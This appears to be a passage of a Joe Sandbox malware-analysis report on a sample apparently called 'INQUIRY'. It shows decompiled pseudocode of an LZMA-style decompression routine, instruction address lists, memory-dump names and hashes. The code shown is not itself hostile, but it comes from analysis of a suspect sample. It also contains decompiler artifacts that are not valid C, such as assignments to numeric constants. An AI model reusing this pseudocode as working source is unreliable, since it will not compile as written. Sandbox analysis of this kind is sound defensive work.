													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406682
0x00406682
0x00406686
0x004066ab
0x004066b5
0x00000000
0x00406688
0x00406688
0x0040668b
0x0040668f
0x00406692
0x00406695
0x00406699
0x00406699
0x0040669c
0x00406776
0x00406776
0x0040677d
0x0040677d
0x00406780
0x00406787
0x004067b4
0x004067b8
0x00406818
0x0040681b
0x00406820
0x00406821
0x00406823
0x00406825
0x00406828
0x00406734
0x00406734
0x00406734
0x00405ed0
0x00405ed0
0x00405ed0
0x00405ed9
0x00000000
0x00000000
0x00405edf
0x00000000
0x00405eea
0x00000000
0x00000000
0x00405ef3
0x00405ef6
0x00405ef9
0x00405efd
0x00000000
0x00000000
0x00405f03
0x00405f06
0x00405f08
0x00405f09
0x00405f0c
0x00405f0e
0x00405f0f
0x00405f11
0x00405f14
0x00405f19
0x00405f1e
0x00405f27
0x00405f3a
0x00405f3d
0x00405f49
0x00405f71
0x00405f73
0x00405f81
0x00405f81
0x00405f85
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f75
0x00405f75
0x00405f78
0x00405f79
0x00405f79
0x00000000
0x00405f75
0x00405f4f
0x00405f54
0x00405f54
0x00405f5d
0x00405f65
0x00405f68
0x00000000
0x00405f6e
0x00405f6e
0x00000000
0x00405f6e
0x00000000
0x00405f8b
0x00405f8b
0x00405f8f
0x0040683b
0x00000000
0x0040683b
0x00405f98
0x00405fa8
0x00405fab
0x00405fae
0x00405fae
0x00405fae
0x00405fb1
0x00405fb5
0x00000000
0x00000000
0x00405fb7
0x00405fbd
0x00405fe7
0x00405fed
0x00405ff4
0x00000000
0x00405ff4
0x00405fc3
0x00405fc6
0x00405fcb
0x00405fcb
0x00405fd6
0x00405fde
0x00405fe1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406026
0x0040602c
0x0040602f
0x0040603c
0x00406044
0x00000000
0x00000000
0x00405ffb
0x00405ffb
0x00405fff
0x0040684a
0x00000000
0x0040684a
0x0040600b
0x00406016
0x00406016
0x00406016
0x00406019
0x0040601c
0x0040601f
0x00406024
0x00000000
0x00000000
0x00000000
0x00000000
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406709
0x0040670d
0x004068bc
0x00000000
0x004068bc
0x00406719
0x00406720
0x00406728
0x0040672b
0x0040672e
0x0040672e
0x00000000
0x00000000
0x0040604c
0x0040604e
0x00406051
0x004060c2
0x004060c5
0x004060c8
0x004060cf
0x004060d9
0x00000000
0x004060d9
0x00406053
0x00406057
0x0040605a
0x0040605c
0x0040605f
0x00406062
0x00406064
0x00406067
0x00406069
0x0040606e
0x00406071
0x00406074
0x00406078
0x0040607f
0x00406082
0x00406089
0x0040608d
0x00406095
0x00406095
0x00406095
0x0040608f
0x0040608f
0x0040608f
0x00406084
0x00406084
0x00406084
0x00406099
0x0040609c
0x004060ba
0x004060bc
0x00000000
0x0040609e
0x0040609e
0x004060a1
0x004060a4
0x004060a7
0x004060a9
0x004060a9
0x004060a9
0x004060ac
0x004060af
0x004060b1
0x004060b2
0x004060b5
0x00000000
0x004060b5
0x00000000
0x004062eb
0x004062ef
0x0040630d
0x00406310
0x00406317
0x0040631a
0x0040631d
0x00406320
0x00406323
0x00406326
0x00406328
0x0040632f
0x00406330
0x00406332
0x00406335
0x00406338
0x0040633b
0x0040633b
0x00406340
0x00000000
0x00406340
0x004062f1
0x004062f4
0x004062f7
0x00406301
0x00000000
0x00000000
0x00406355
0x00406359
0x0040637c
0x0040637f
0x00406382
0x0040638c
0x0040635b
0x0040635b
0x0040635e
0x00406361
0x00406364
0x00406371
0x00406374
0x00406374
0x00000000
0x00000000
0x00406398
0x0040639c
0x00000000
0x00000000
0x004063a2
0x004063a6
0x00000000
0x00000000
0x004063ac
0x004063ae
0x004063b2
0x004063b2
0x004063b5
0x004063b9
0x00000000
0x00000000
0x00406409
0x0040640d
0x00406414
0x00406417
0x0040641a
0x00406424
0x00000000
0x00406424
0x0040640f
0x00000000
0x00000000
0x00406430
0x00406434
0x0040643b
0x0040643e
0x00406441
0x00406436
0x00406436
0x00406436
0x00406444
0x00406447
0x0040644a
0x0040644a
0x0040644d
0x00406450
0x00406453
0x00406453
0x00406456
0x0040645d
0x00406462
0x00000000
0x00000000
0x004064f0
0x004064f0
0x004064f4
0x00406892
0x00000000
0x00406892
0x004064fa
0x004064fd
0x00406500
0x00406504
0x00406507
0x0040650d
0x0040650f
0x0040650f
0x0040650f
0x00406512
0x00406515
0x00000000
0x00000000
0x004060e5
0x004060e5
0x004060e9
0x00406856
0x00000000
0x00406856
0x004060ef
0x004060f2
0x004060f5
0x004060f9
0x004060fc
0x00406102
0x00406104
0x00406104
0x00406104
0x00406107
0x0040610a
0x0040610a
0x0040610d
0x00406110
0x00000000
0x00000000
0x00406116
0x0040611c
0x00000000
0x00000000
0x00406122
0x00406122
0x00406126
0x00406129
0x0040612c
0x0040612f
0x00406132
0x00406133
0x00406136
0x00406138
0x0040613e
0x00406141
0x00406144
0x00406147
0x0040614a
0x0040614d
0x00406150
0x0040616c
0x0040616f
0x00406172
0x00406175
0x0040617c
0x00406180
0x00406182
0x00406186
0x00406152
0x00406152
0x00406156
0x0040615e
0x00406163
0x00406165
0x00406167
0x00406167
0x00406189
0x00406190
0x00406193
0x00000000
0x00406199
0x00000000
0x00406199
0x00000000
0x0040619e
0x0040619e
0x004061a2
0x00406862
0x00000000
0x00406862
0x004061a8
0x004061ab
0x004061ae
0x004061b2
0x004061b5
0x004061bb
0x004061bd
0x004061bd
0x004061bd
0x004061c0
0x004061c3
0x004061c3
0x004061c3
0x004061c9
0x00000000
0x00000000
0x004061cb
0x004061ce
0x004061d1
0x004061d4
0x004061d7
0x004061da
0x004061dd
0x004061e0
0x004061e3
0x004061e6
0x004061e9
0x00406201
0x00406204
0x00406207
0x0040620a
0x0040620a
0x0040620d
0x00406211
0x00406213
0x004061eb
0x004061eb
0x004061f3
0x004061f8
0x004061fa
0x004061fc
0x004061fc
0x00406216
0x0040621d
0x00406220
0x00000000
0x00406222
0x00000000
0x00406222
0x00406220
0x00406227
0x00406227
0x00406227
0x00406227
0x00000000
0x00000000
0x00406262
0x00406262
0x00406266
0x0040686e
0x00000000
0x0040686e
0x0040626c
0x0040626f
0x00406272
0x00406276
0x00406279
0x0040627f
0x00406281
0x00406281
0x00406281
0x00406284
0x00406287
0x00406287
0x0040628d
0x0040622b
0x0040622b
0x0040622e
0x00000000
0x0040622e
0x0040628f
0x0040628f
0x00406292
0x00406295
0x00406298
0x0040629b
0x0040629e
0x004062a1
0x004062a4
0x004062a7
0x004062aa
0x004062ad
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062ce
0x004062d1
0x004062d5
0x004062d7
0x004062af
0x004062af
0x004062b7
0x004062bc
0x004062be
0x004062c0
0x004062c0
0x004062da
0x004062e1
0x004062e4
0x00000000
0x004062e6
0x00000000
0x004062e6
0x00000000
0x00406573
0x00406573
0x00406577
0x0040689e
0x00000000
0x0040689e
0x0040657d
0x00406580
0x00406583
0x00406587
0x0040658a
0x00406590
0x00406592
0x00406592
0x00406592
0x00406595
0x00000000
0x00000000
0x00406343
0x00406343
0x00406346
0x004066b8
0x004066b8
0x00000000
0x00000000
0x00000000
0x00000000
0x0040673f
0x00406743
0x00406761
0x00406761
0x00406761
0x00406768
0x0040676f
0x00000000
0x0040676f
0x00406745
0x00406748
0x0040674b
0x0040674e
0x00406755
0x00000000
0x00000000
0x00406830
0x00406833
0x00406734
0x00406734
0x00000000
0x00000000
0x0040646a
0x0040646c
0x00406473
0x00406474
0x00406476
0x00406479
0x00000000
0x00000000
0x00406481
0x00406484
0x00406487
0x00406489
0x0040648b
0x0040648b
0x0040648c
0x0040648f
0x00406496
0x00406499
0x004064a7
0x00000000
0x00000000
0x00000000
0x00000000
0x0040678c
0x0040678c
0x00406790
0x004068c8
0x00000000
0x004068c8
0x00406796
0x00406799
0x0040679c
0x004067a0
0x004067a3
0x004067a9
0x004067ab
0x004067ab
0x004067ab
0x004067ae
0x004067b1
0x004067b1
0x004067b1
0x004067b1
0x00000000
0x00000000
0x004064af
0x004064b2
0x004064e8
0x00406618
0x00406618
0x00406618
0x00406618
0x0040661b
0x0040661b
0x0040661e
0x00406620
0x004068aa
0x00000000
0x004068aa
0x00406626
0x00406629
0x00000000
0x00000000
0x0040662f
0x00406633
0x00406636
0x00406636
0x00406636
0x00000000
0x00406636
0x004064b4
0x004064b6
0x004064b8
0x004064ba
0x004064bd
0x004064be
0x004064c0
0x004064c2
0x004064c5
0x004064c8
0x004064de
0x004064e3
0x0040651b
0x0040651b
0x0040651f
0x0040654b
0x0040654d
0x00406554
0x00406557
0x0040655a
0x0040655a
0x0040655f
0x0040655f
0x00406561
0x00406564
0x0040656b
0x0040656e
0x0040659b
0x0040659b
0x0040659e
0x004065a1
0x00406615
0x00406615
0x00406615
0x00000000
0x00406615
0x004065a3
0x004065a9
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b8
0x004065bb
0x004065be
0x004065c1
0x004065c4
0x004065dd
0x004065df
0x004065e2
0x004065e3
0x004065e6
0x004065e8
0x004065eb
0x004065ed
0x004065ef
0x004065f2
0x004065f4
0x004065f7
0x004065fb
0x004065fd
0x004065fd
0x004065fe
0x00406601
0x00406604
0x004065c6
0x004065c6
0x004065ce
0x004065d3
0x004065d5
0x004065d8
0x004065d8
0x00406607
0x0040660e
0x00406598
0x00406598
0x00406598
0x00406598
0x00000000
0x00406610
0x00000000
0x00406610
0x0040660e
0x00406521
0x00406524
0x00406526
0x00406529
0x0040652c
0x0040652f
0x00406531
0x00406534
0x00406537
0x00406537
0x0040653a
0x0040653a
0x0040653d
0x00406544
0x00406518
0x00406518
0x00406518
0x00406518
0x00000000
0x00406546
0x00000000
0x00406546
0x00406544
0x004064ca
0x004064cd
0x004064cf
0x004064d2
0x00000000
0x00000000
0x00406231
0x00406231
0x00406235
0x0040687a
0x00000000
0x0040687a
0x0040623b
0x0040623e
0x00406241
0x00406244
0x00406247
0x0040624a
0x0040624d
0x0040624f
0x00406252
0x00406255
0x00406258
0x0040625a
0x0040625a
0x0040625a
0x00000000
0x00000000
0x004063bc
0x004063bc
0x004063c0
0x00406886
0x00000000
0x00406886
0x004063c6
0x004063c9
0x004063cc
0x004063cf
0x004063d1
0x004063d1
0x004063d1
0x004063d4
0x004063d7
0x004063da
0x004063dd
0x004063e0
0x004063e3
0x004063e4
0x004063e6
0x004063e6
0x004063e6
0x004063e9
0x004063ec
0x004063ef
0x004063f2
0x004063f2
0x004063f2
0x004063f5
0x004063f7
0x004063f7
0x00000000
0x00000000
0x00406639
0x00406639
0x00406639
0x0040663d
0x00000000
0x00000000
0x00406643
0x00406646
0x00406649
0x0040664c
0x0040664e
0x0040664e
0x0040664e
0x00406651
0x00406654
0x00406657
0x0040665a
0x0040665d
0x00406660
0x00406661
0x00406663
0x00406663
0x00406663
0x00406666
0x00406669
0x0040666c
0x0040666f
0x00406672
0x00406676
0x00406678
0x0040667b
0x00000000
0x0040667d
0x004063fa
0x004063fa
0x00000000
0x004063fa
0x0040667b
0x004068b0
0x004068d2
0x004068d8
0x004068da
0x004068e1
0x004068e3
0x004068ea
0x004068ee
0x00000000
0x00405edf
0x004068e7
0x004068e7
0x00000000
0x004068e7
0x00406734
0x004067ba
0x004067c0
0x004067c3
0x004067c6
0x004067c9
0x004067cc
0x004067cf
0x004067d2
0x004067d5
0x004067db
0x004067f4
0x004067f7
0x004067fa
0x004067fd
0x00406801
0x00406803
0x00406804
0x00406807
0x004067dd
0x004067dd
0x004067e5
0x004067ea
0x004067ec
0x004067ef
0x004067ef
0x00406811
0x00000000
0x00406813
0x00000000
0x00406813
0x00406811
0x00000000
0x00406686

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
Instruction ID: bb8ed6064adbc6ac752208bd1780db284a58169b415d1e5229999a4f541ad509
Opcode Fuzzy Hash: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
Instruction Fuzzy Hash: 11912271D00229CBDF28CF98C854BADBBB1FB44305F15816AD816BB291C7789A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406398 Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406398() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004068EF))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
